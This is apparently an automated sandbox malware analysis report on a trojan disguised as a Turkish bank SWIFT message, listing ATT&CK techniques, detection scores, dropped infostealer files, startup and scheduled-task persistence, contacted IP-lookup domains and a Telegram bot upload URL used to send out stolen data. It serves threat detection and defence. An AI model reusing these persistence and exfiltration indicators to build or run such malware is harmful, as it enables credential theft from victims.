Gather Victim Identity Information	111 Scripting	2 Valid Accounts	13 Native API	111 Scripting	1 Exploitation for Privilege Escalation	111 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	121 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Valid Accounts	2 Valid Accounts	3 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 Scheduled Task/Job	21 Access Token Manipulation	1 Software Packing	NTDS	137 System Information Discovery	Distributed Component Object Model	1 Email Collection	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	2 Registry Run Keys / Startup Folder	212 Process Injection	1 Timestomp	LSA Secrets	241 Security Software Discovery	SSH	121 Input Capture	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Scheduled Task/Job	1 DLL Side-Loading	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	3 Clipboard Data	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	2 Registry Run Keys / Startup Folder	1 Masquerading	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	2 Valid Accounts	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	31 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	21 Access Token Manipulation	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	212 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	53%	ReversingLabs	Win32.Trojan.AutoitInject
Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	100%	Avira	TR/Dropper.Gen
C:\Users\user\AppData\Local\Temp\server01.exe	100%	Avira	TR/ATRAPS.Gen
C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	100%	Avira	TR/Dropper.Gen
C:\Users\user\AppData\Local\cyclop\directiveness.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\server01.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	79%	ReversingLabs	ByteCode-MSIL.Infostealer.ClipBanker
C:\Users\user\AppData\Local\Temp\server01.exe	71%	ReversingLabs	ByteCode-MSIL.Infostealer.Mintluks
C:\Users\user\AppData\Local\cyclop\directiveness.exe	53%	ReversingLabs	Win32.Trojan.AutoitInject

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	172.67.177.134	true	false	high
s-part-0035.t-0009.t-msedge.net	13.107.246.63	true	false	high
checkip.dyndns.com	193.122.6.168	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://reallyfreegeoip.org/xml/8.46.123.75	false		high
http://checkip.dyndns.org/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000006.00000002.1435698367.0000000005FAE000.00000004.00000800.00020000.00000000.sdmp	false	high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000006.00000002.1427861026.0000000005096000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000006.00000002.1427861026.0000000005096000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000006.00000002.1427861026.0000000005096000.00000004.00000800.00020000.00000000.sdmp	false	high
http://reallyfreegeoip.orgd	server01.exe, 00000005.00000002.2592996086.0000000002D0B000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/License	powershell.exe, 00000006.00000002.1435698367.0000000005FAE000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/Icon	powershell.exe, 00000006.00000002.1435698367.0000000005FAE000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org	server01.exe, 00000005.00000002.2592996086.0000000002CDC000.00000004.00000800.00020000.00000000.sdmp, server01.exe, 00000005.00000002.2592996086.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp	false	high
https://github.com/Pester/Pester	powershell.exe, 00000006.00000002.1427861026.0000000005096000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/8.46.123.75l	server01.exe, 00000005.00000002.2592996086.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.comd	server01.exe, 00000005.00000002.2592996086.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp	false	high
https://aka.ms/pscore6lB	powershell.exe, 00000006.00000002.1427861026.0000000004F41000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/8.46.123.75d	server01.exe, 00000005.00000002.2592996086.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org/q	RegSvcs.exe, 00000003.00000002.1368343181.0000000003F1D000.00000004.00000800.00020000.00000000.sdmp, server01.exe, 00000005.00000000.1358693008.0000000000872000.00000002.00000001.01000000.0000000A.sdmp	false	high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000006.00000002.1427861026.0000000005096000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/	powershell.exe, 00000006.00000002.1435698367.0000000005FAE000.00000004.00000800.00020000.00000000.sdmp	false	high
https://nuget.org/nuget.exe	powershell.exe, 00000006.00000002.1435698367.0000000005FAE000.00000004.00000800.00020000.00000000.sdmp	false	high
http://reallyfreegeoip.org	server01.exe, 00000005.00000002.2592996086.0000000002D0B000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.orgd	server01.exe, 00000005.00000002.2592996086.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org	server01.exe, 00000005.00000002.2592996086.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.com	server01.exe, 00000005.00000002.2592996086.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org/d	server01.exe, 00000005.00000002.2592996086.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	server01.exe, 00000005.00000002.2592996086.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1427861026.0000000004F41000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot-/sendDocument?chat_id=	RegSvcs.exe, 00000003.00000002.1368343181.0000000003F1D000.00000004.00000800.00020000.00000000.sdmp, server01.exe, 00000005.00000000.1358693008.0000000000872000.00000002.00000001.01000000.0000000A.sdmp	false	high
https://reallyfreegeoip.org/xml/	RegSvcs.exe, 00000003.00000002.1368343181.0000000003F1D000.00000004.00000800.00020000.00000000.sdmp, server01.exe, 00000005.00000000.1358693008.0000000000872000.00000002.00000001.01000000.0000000A.sdmp, server01.exe, 00000005.00000002.2592996086.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
193.122.6.168	checkip.dyndns.com	United States		31898	ORACLE-BMC-31898US	false
172.67.177.134	reallyfreegeoip.org	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1562164
Start date and time:	2024-11-25 09:44:10 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 31s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	21
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@23/16@2/2
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 97% Number of executed functions: 50 Number of non-executed functions: 313
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Trading_AIBot.exe, PID 7796 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7896 because it is empty
Execution Graph export aborted for target server01.exe, PID 7812 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe

Simulations

Behavior and APIs

Time	Type	Description
03:45:07	API Interceptor	26x Sleep call for process: powershell.exe modified
03:45:42	API Interceptor	72677x Sleep call for process: apihost.exe modified
08:45:05	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\directiveness.vbs
08:45:06	Task Scheduler	Run new task: AccSys path: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe
08:45:18	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
193.122.6.168	IMG-20241119-WA0006(162KB).Pdf.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	ZEcVl5jzXD.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	rrequestforquotation.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	New_Order_PO-NG57283H9.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	GST DRC-01A - DIN-20230359XL050081843E_msg.exe	Get hash	malicious	GuLoader	Browse	checkip.dyndns.org/
	BOQ and Full Specification.exe	Get hash	malicious	GuLoader	Browse	checkip.dyndns.org/
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	z30ProofofPaymentAttached.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
172.67.177.134	IMG-20241119-WA0006(162KB).Pdf.exe	Get hash	malicious	Snake Keylogger	Browse
	NEW P.O.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse
	MC8017774DOCS.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse
	Shave.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse
	New shipment AWB NO - 09804480383.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse
	sosoliso.exe	Get hash	malicious	MassLogger RAT	Browse
	rrequestforquotation.exe	Get hash	malicious	Snake Keylogger	Browse
	STAFF RECORD_pdf.arj.exe	Get hash	malicious	Unknown	Browse
	Documents.pdf.exe	Get hash	malicious	MassLogger RAT	Browse
	SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.dyndns.com	VSP469620.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	order requirements CIF-TRC809910645210.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	IMG-20241119-WA0006(162KB).Pdf.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	NEW P.O.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.247.73
	MC8017774DOCS.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	Pigroots.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	Shave.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	New shipment AWB NO - 09804480383.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	132.226.247.73
	rorderrequirementsCIF-TRC809910645210.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	PaymentAdvice.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
s-part-0035.t-0009.t-msedge.net	fusioncharts.charts.js	Get hash	malicious	Unknown	Browse	13.107.246.63
	0a0#U00a0.js	Get hash	malicious	RHADAMANTHYS	Browse	13.107.246.63
	1234.exe	Get hash	malicious	Unknown	Browse	13.107.246.63
	file.exe	Get hash	malicious	Unknown	Browse	13.107.246.63
	somes.exe	Get hash	malicious	RedLine	Browse	13.107.246.63
	segura.vbs	Get hash	malicious	Remcos	Browse	13.107.246.63
	file.exe	Get hash	malicious	LummaC Stealer	Browse	13.107.246.63
	Cargo Invoice_pdf.vbs	Get hash	malicious	Remcos, GuLoader	Browse	13.107.246.63
	P0-4856383648383364838364836483.xls	Get hash	malicious	Unknown	Browse	13.107.246.63
	DHL AWB_004673321.vbe	Get hash	malicious	FormBook	Browse	13.107.246.63
reallyfreegeoip.org	VSP469620.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	order requirements CIF-TRC809910645210.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	IMG-20241119-WA0006(162KB).Pdf.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	NEW P.O.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	172.67.177.134
	MC8017774DOCS.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	Pigroots.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	Shave.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	New shipment AWB NO - 09804480383.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	172.67.177.134
	rorderrequirementsCIF-TRC809910645210.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	PaymentAdvice.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.67.152

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ORACLE-BMC-31898US	VSP469620.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	IMG-20241119-WA0006(162KB).Pdf.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	Pigroots.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	Shave.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	ZEcVl5jzXD.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	powerpc.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	168.139.6.21
	rrequestforquotation.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	SOA SEP 2024.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	193.122.130.0
	arm5.nn-20241122-0008.elf	Get hash	malicious	Mirai, Okiru	Browse	147.154.211.97
	Updated Invoice_0755404645-2024_pdf.exe	Get hash	malicious	Unknown	Browse	158.101.44.242
CLOUDFLARENETUS	IETC-24017.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	172.67.186.192
	VSP469620.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	order requirements CIF-TRC809910645210.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	http://google.com	Get hash	malicious	Unknown	Browse	172.67.136.186
	saiya.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	172.67.19.24
	IMG-20241119-WA0006(162KB).Pdf.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.88.250
	https://linktr.ee/priyanka662	Get hash	malicious	Gabagool	Browse	172.67.74.152
	t90RvrDNvz.exe	Get hash	malicious	Unknown	Browse	172.67.204.237
	segura.vbs	Get hash	malicious	Remcos	Browse	172.67.187.200

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	VSP469620.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	order requirements CIF-TRC809910645210.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
	IMG-20241119-WA0006(162KB).Pdf.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	NEW P.O.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	172.67.177.134
	MC8017774DOCS.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	Pigroots.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	Shave.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	New shipment AWB NO - 09804480383.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	172.67.177.134
	rorderrequirementsCIF-TRC809910645210.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	PaymentAdvice.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	172.67.177.134

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\server01.exe	PO #09465610_GQ 003745_SO-242000846.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse
C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	PO #09465610_GQ 003745_SO-242000846.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse
	IBKB.vbs	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse
	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	520
Entropy (8bit):	5.355496254154943
Encrypted:	false
SSDEEP:	12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:MLUE4K5E4KlKDE4KhKiKhk
MD5:	3C255C75EA6EB42410894C0D08A4E324
SHA1:	34B3512313867B269C545241CD502B960213293A
SHA-256:	116B1D2FF17BE7FE8C4B6D935688F81C40716AFCD995C76BFC2D1AB2AFA774A7
SHA-512:	41406D84C3FC3D5EFAD22277382D9ADC444D00FDE95C1B7B6BC17E80452CA5DE084D28D892BC0C6890FE64DC733790E26D0F62FE3477175DCCCAC777FDE5E7EC
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.379552885213346
Encrypted:	false
SSDEEP:	48:fWSU4xympjgs4Rc9tEoUl8NPZHUl7u1iMugeC/ZM0Uyus:fLHxvCsIcnSKRHmOugw1s
MD5:	1BCE6F337D6D0B11F7C8EE4653BBB3E2
SHA1:	D509AF0F509BE4E276481BDA726A101CE29C9EF0
SHA-256:	DF7179BDD8B9DC04AA5496A5E67D827F7D949DDA2FF1CA7F05CF4F3C18BC40E8
SHA-512:	B7E361D574C2FA2FF0638AE4B15E397FA66FC07823F4EE2061963D85C3DB6F618F871DB3FC1318D9ED8CC97775712A8B26C6939615C76EDCFD6EFD26EF0F341D
Malicious:	false
Preview:	@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<...............V.}...@...i...........System.Transactions.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	70656
Entropy (8bit):	4.910353963160109
Encrypted:	false
SSDEEP:	1536:ZPqWETbZazuYx3cOBB03Cmp3gGLWUTbUwjKX4C2b+d:ZizbZazunOKrp3gGhTbUwjI4C2Sd
MD5:	E91A1DB64F5262A633465A0AAFF7A0B0
SHA1:	396E954077D21E94B7C20F7AFA22A76C0ED522D0
SHA-256:	F19763B48B2D2CC92E61127DD0B29760A1C630F03AD7F5055FD1ED9C7D439428
SHA-512:	227D7DAD569D77EF84326E905B7726C722CEFF331246DE4F5CF84428B9721F8B2732A31401DF6A8CEF7513BCD693417D74CDD65D54E43C710D44D1726F14B0C5
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 79%
Joe Sandbox View:	Filename: PO #09465610_GQ 003745_SO-242000846.exe, Detection: malicious, Browse Filename: IBKB.vbs, Detection: malicious, Browse Filename: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd, Detection: malicious, Browse Filename: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............n)... ...@....@.. ....................................`..................................)..W....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P)......H........>...............=..p...........................................".(!......s3...z...s..........(.....Z~ ...oK...~....(!.....(5....&.(!.....".......".(u....Vs....(v...t.........&..(.....Br...p(.....(....sL....).......0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_55hgpvod.jdp.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ai0iceth.pba.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ourq2vgn.02y.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vxokwycy.wbs.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\aut7125.tmp

Download File

